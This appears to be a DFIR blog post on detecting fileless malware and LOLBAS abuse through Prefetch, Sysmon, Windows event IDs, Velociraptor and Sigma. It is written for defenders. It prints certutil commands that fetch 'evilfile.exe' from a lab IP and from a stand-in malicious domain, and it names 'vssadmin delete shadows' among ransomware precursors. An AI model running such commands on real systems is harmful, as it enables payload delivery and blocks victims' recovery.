Fileless malware refers to malicious software that does not rely on traditional executable files on the filesystem, but it is important to emphasize that "fileless" does not equate to "artifactless." Evidence of such attacks often exists in various forms across the disk and system memory, making it crucial for Digital Forensics and Incident Response (DFIR) specialists to know where to look.
Key Locations for Artifact Discovery
Even in fileless malware attacks, traces can be found in several places:
Evidence of execution: Prefetch, Shimcache, and AppCompatCache
Registry keys: Large binary data or encoded PowerShell commands.
Event logs: Process creation, service creation, and Task Scheduler events.
PowerShell artifacts: PowerShell transcripts and PSReadLine
Scheduled Tasks: Attackers may schedule malicious tasks to persist.
Autorun/Startup keys
WMI Event Consumers: These can be exploited to run malicious code without leaving typical executable traces.
Example 1: DLL Side-Loading with PlugX
DLL side-loading is a stealthy technique used by malware like PlugX, where legitimate software is abused to load malicious DLLs into memory. The typical attack steps involve:
Phishing email: The attacker sends a phishing email to the victim.
Decoy file and dropper: The victim opens a legitimate-looking file (e.g., a spreadsheet) that also delivers the payload.
Dropper execution: A dropper executable (e.g., ews.exe) is saved to disk, dropping several files. One of these, oinfop11.exe, is a legitimate part of Office 2003, making it appear trusted.
Malicious DLL injection: The legitimate executable loads a spoofed DLL (oinfo11.ocx), which decrypts and activates the actual malware.
At this point, the malicious DLL operates in the memory space of a trusted program, evading traditional detection mechanisms.
Example 2: Registry Key Abuse
In another example, attackers may modify the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. This key can be used to launch PowerShell scripts via Windows Script Host (WSH), enabling the attacker to execute code every time the system boots up.
Example 3: WMI Event Filters and Fake Updaters
Attackers often leverage WMI (Windows Management Instrumentation) to create event filters that trigger malicious activities, such as launching a fake updater. In this scenario:
WMI uses regsvr32.exe to call out to a malicious site.
The malicious site hosts additional malware files, furthering the attack.
Living Off the Land (LOLBAS) Attacks
Living Off the Land Binaries and Scripts (LOLBAS) refer to legitimate tools and binaries that attackers exploit for malicious purposes, reducing the need to introduce new files to the system. This approach makes detection more challenging since the binaries are usually trusted system files.
The LOLBAS Project
The LOLBAS Project on GitHub compiles data on legitimate Windows binaries and scripts that can be weaponized by attackers. The project categorizes these tools based on their functions, including:
Alternate Data Streams (ADS) manipulation
AWL bypasses (e.g., bypassing AppLocker)
Credential dumping and code compilation
Reconnaissance and UAC bypasses
Common LOLBAS in Use
Several Windows binaries are frequently misused in the wild:
CertUtil.exe
Regsvr32.exe
RunDLL32.exe
ntdsutil.exe
Diskshadow.exe
Example: CertUtil Misuse
An example of CertUtil.exe being misused involves downloading a file from a remote server. The command used is:
certutil.exe -urlcache -split -f http[:]//192.168.182.129[:]8000/evilfile.exe goodfile.exeSeveral detection points exist here:
Command-line arguments: Detect unusual arguments like urlcache using Event ID 4688 (Windows) or Sysmon Event ID 1.
File creation: Detect CertUtil writing to disk using Sysmon Event ID 11 or endpoint detection and response (EDR) solutions.
Network activity: CertUtil making network connections on non-standard HTTPS ports is unusual and should be flagged.
----------------------------------------------------------------------------------------------
1. Hunting LOLBAS Execution with Prefetch
LOLBAS (Living Off the Land Binaries and Scripts) refers to the use of legitimate binaries, often pre-installed on Windows systems, that attackers can misuse for malicious purposes. Tools like CertUtil.exe, Regsvr32.exe, and PowerShell are frequently used in these attacks. Hunting for these within enterprise environments requires collecting data from various sources such as prefetch files, event logs, and process data.
Prefetch Hunting Tips:
Prefetch data is stored in the C:\Windows\Prefetch folder and provides insight into recently executed binaries.
Velociraptor is a great tool for collecting and analyzing prefetch files across an enterprise environment. Running a regex search for specific LOLBAS tools such as sdelete.exe, certutil.exe, or taskkill.exe can help narrow down suspicious executions.
To perform a regex search using Velociraptor:
Step 1: Collect prefetch files.
Step 2: Apply regex filters to search for known LOLBAS tools.
Key Considerations:
Prefetch hunting can be noisy due to legitimate execution of trusted binaries.
Analyze paths used by the binaries. For example, C:\Windows\System32\spool\drivers\color\ is commonly abused due to its write permissions.
Look for rarely seen executables or unusual paths that might indicate lateral movement or privilege escalation.
2. Intelligence Gathering: Suspicious Emails and Threat Hunts
When a suspicious email is reported, especially after an initial compromise:
SOC actions: SOC analysts may update email filters, remove copies from the mailserver, but must also hunt across endpoints for signs of delivery.
Using the SHA1 hash of the malicious file can help locate copies on other endpoints.
For example:
you can use Velociraptor with Generic.Forensic.LocalHashes.Init to build a hash database, and then populate it with GenericForensic.LocalHashes.Glob.
3. Endpoint Data Hunting
Key areas for LOLBAS detection on endpoints:
Prefetch Files: As mentioned, rarely used executables like CertUtil or Regsvr32 may signal LOLBAS activity.
Running Processes: Collect processes from all endpoints. Uncommon processes, especially those tied to known LOLBAS binaries, should be investigated.
4. SIEM and Event Log Analysis
Event logs and SIEM tools offer key visibility for LOLBAS detection:
Sysmon Event 1 (Process Creation): Captures process creation events and contains critical information like command-line arguments and file hashes.
Windows Security Event 4688: This event captures process creation events, and when paired with Event 4689 (process termination), it provides complete context for process lifetime, which can be useful in detecting LOLBAS activity.
Common LOLBAS Detection via Event Logs:
CertUtil.exe: Detect by filtering for the user agent string Microsoft-CryptoAPI/*.
PowerShell: Detect suspicious PowerShell execution using its user agent string: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.610
Microsoft BITS/* – BITS
-----------------------------------------------------------------------------------------------------------
1. Hunting Process Creation Events with Sysmon (Event ID 1)
Sysmon's Event ID 1 (Process Creation) is a critical log for detecting Living Off the Land Binaries and Scripts (LOLBAS) attacks, as it provides detailed information about processes that are started on endpoints. However, since LOLBAS attacks often use legitimate, signed executables, it's essential to look beyond basic indicators like file hashes.
Key information from Sysmon Event ID 1 includes:
Process Hash: While helpful for detecting malicious software, it is less useful for LOLBAS because the executables involved are usually Microsoft-signed binaries, which are seen as legitimate.
Parent Command Line: The parent process command line can be very informative in some situations, especially when exploring more advanced attack chains. However, for many LOLBAS hunts, it might just indicate cmd.exe or explorer.exe, which are often used as the parent processes in these attacks.
2. Windows Security Event 4688 (Process Creation)
Windows Security Event 4688 is another valuable source for capturing process creation data. For LOLBAS hunting, focusing on a few key fields in Event 4688 is particularly useful:
Parent Process: Although often cmd.exe or explorer.exe, this information can reveal if the process was initiated by a legitimate GUI or a script, or if it was spawned by a more suspicious process like w3wp.exe (IIS) running
CertUtil.exe. If the parent process is something like IIS or a PowerShell script, it suggests automation or an attack executed remotely (e.g., via a webshell).
Process Command Line: This is critical because it includes any arguments passed to the executable. In LOLBAS attacks, unusual command-line switches or paths used by trusted binaries (like CertUtil.exe -urlcache) can reveal malicious intent.
Token Elevation Type:
%%1936: Full token with all privileges, suggesting no UAC restriction.
%%1937: Elevated privileges, indicating that a user has explicitly run the application with “Run as Administrator.”
%%1938: Normal user privileges. These indicators are helpful to see if the binary was executed with elevated permissions, which could hint at privilege escalation attempts.
3. Windows Firewall Event Logs for LOLBAS Detection
Firewalls can provide additional information about LOLBAS activities, particularly in relation to network-based attacks. Event logs such as 5156 (allowed connection) or 5158 (port binding) can help spot outbound connections initiated by LOLBAS binaries like CertUtil.exe or Bitsadmin.exe.
Key fields in firewall logs:
Process ID/Application Name: This tells you which binary initiated the network connection. Tracking legitimate but rarely used binaries (e.g., CertUtil) making outbound connections to unusual IP addresses can indicate an attack.
Destination IP Address: Correlating this with known good IPs or threat intelligence data is critical to confirm whether the connection is benign or suspicious.
4. Event Log Analysis for LOLBAS
For deeper LOLBAS detection, multiple event logs should be analyzed together:
4688: Logs the start of a process (the key event for initial execution detection).
4689: Logs the end of a process, providing insights into how long the process was running and whether it completed successfully.
5156 and 5158: Track firewall events, focusing on port binding and outbound connections. Any outbound traffic initiated by unusual executables like Bitsadmin.exe or CertUtil.exe should be scrutinized.
5. Detecting Ransomware Precursors with LOLBAS
Many ransomware attacks involve the use of LOLBAS commands to weaken defenses or prepare the environment for encryption:
Disabling security tools: Commands like taskkill.exe or net stop are used to terminate processes that protect the system.
Firewall/ACL modifications: netsh.exe might be used to modify firewall rules to allow external connections.
Taking ownership of files: This ensures the ransomware can encrypt files unhindered.
Disabling backups/Volume Shadow Copies: Commands like vssadmin.exe delete shadows are common to prevent file recovery.
Since these activities often involve legitimate system tools, auditing these actions can serve as an early warning.
6. Improving Detection with Windows Auditing
For better detection of LOLBAS attacks and ransomware precursors, implement the following Windows auditing settings:
Process Creation Auditing:
Auditpol /set /subcategory:"Process Creation" /success:enable /failure:enableThis ensures that every process creation event is logged, which is crucial for identifying LOLBAS activity.
Command Line Auditing:
reg add "hklm\software\microsoft\windows\currentversion\policies\system\audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1Enabling command-line logging is crucial because LOLBAS binaries often need unusual arguments to perform malicious actions.
PowerShell Logging:
reg add "hklm\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" /v EnableModuleLogging /t REG_DWORD /d 1
reg add "hklm\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" /v EnableScriptBlockLogging /t REG_DWORD /d 1PowerShell script block logging captures the full content of commands executed within PowerShell, which is a key LOLBAS tool used for various attacks.
7. Sysmon: Enhanced Visibility for LOLBAS
Deploying Sysmon enhances your visibility into system activities, especially for LOLBAS detection:
File Hashes: Sysmon captures the hash of the executing file, which is less helpful for LOLBAS as these files are usually legitimate. However, the combination of the file hash with process execution data can still provide context.
Process Command Line: Sysmon logs detailed command-line arguments, which are crucial for spotting LOLBAS attacks. The presence of rarely used switches or network connections from unexpected binaries is a red flag.
Because Sysmon captures more detailed process creation data than Windows Security Events, it’s a preferred tool for more advanced hunting, especially when dealing with stealthy attacks involving LOLBAS tools.
8. Sigma Rules for LOLBAS Detection
Sigma rules provide a framework for creating reusable detection logic that can work across different platforms and SIEM solutions. Using Sigma, you can write detection logic in a human-readable format and then convert it into SIEM-specific queries using tools like Uncoder.io.
Advantages of Sigma:
Detection logic is SIEM-agnostic. This allows you to use the same detection rules even if your organization switches SIEM platforms.
Sigma rules can be easily integrated with Sysmon, Windows Security Events, and other logging tools, making them highly adaptable.
By using Sigma for LOLBAS detection, you ensure consistent alerts across all environments.
9. Practical Example of LOLBAS Detection: CertUtil
Here’s an example of how CertUtil.exe might be used in an attack:
certutil.exe -urlcache -split -f http[:]//malicious-site[.]com/evilfile.exe goodfile.exeThis command downloads a file from a remote server and stores it on the local system. While CertUtil is a legitimate Windows tool for managing certificates, it can be misused for file downloads.
Sysmon Event 1: You would capture the process command line and see the -urlcache argument, which is rare in normal usage.
Firewall Event 5156: Logs the connection attempt from CertUtil.exe to the malicious IP.
Security Event 4688: Logs the creation of CertUtil.exe, providing the process ID and command-line arguments.
Conclusion:
Effectively hunting LOLBAS and fileless malware requires a combination of detailed event logging, process monitoring, prefetch analysis, and centralized log management. By leveraging tools like Sysmon, Velociraptor, and Sigma, organizations can strengthen their detection capabilities and proactively defend against stealthy attacks that rely on legitimate system tools to evade traditional security measures.
Akash Patel
Comments